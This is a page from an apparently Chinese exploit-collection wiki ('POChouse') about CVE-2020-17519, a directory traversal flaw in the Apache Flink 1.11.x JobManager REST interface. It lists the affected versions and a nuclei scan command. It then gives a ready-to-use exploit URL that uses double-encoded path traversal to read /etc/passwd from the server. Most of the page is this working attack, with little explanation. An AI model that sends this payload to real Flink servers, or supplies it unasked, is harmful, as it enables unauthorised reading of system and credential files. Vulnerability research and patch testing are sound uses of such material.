menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Apache-Flink chevron_right Apache-Flink-jobmanager 目录遍历(CVE-2020-17519)
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    Apache Flink 1.11.0中引入的一个更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

    影响范围

    Apache Flink 1.11.0
Apache Flink 1.11.1
Apache Flink 1.11.2

    POC

    nuclei.exe -tags apache -t cves/ -stats -u http://test.com:8081

    EXP

    http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

    参考链接

    CVE-2020-17519 & CVE-2020-17518 分析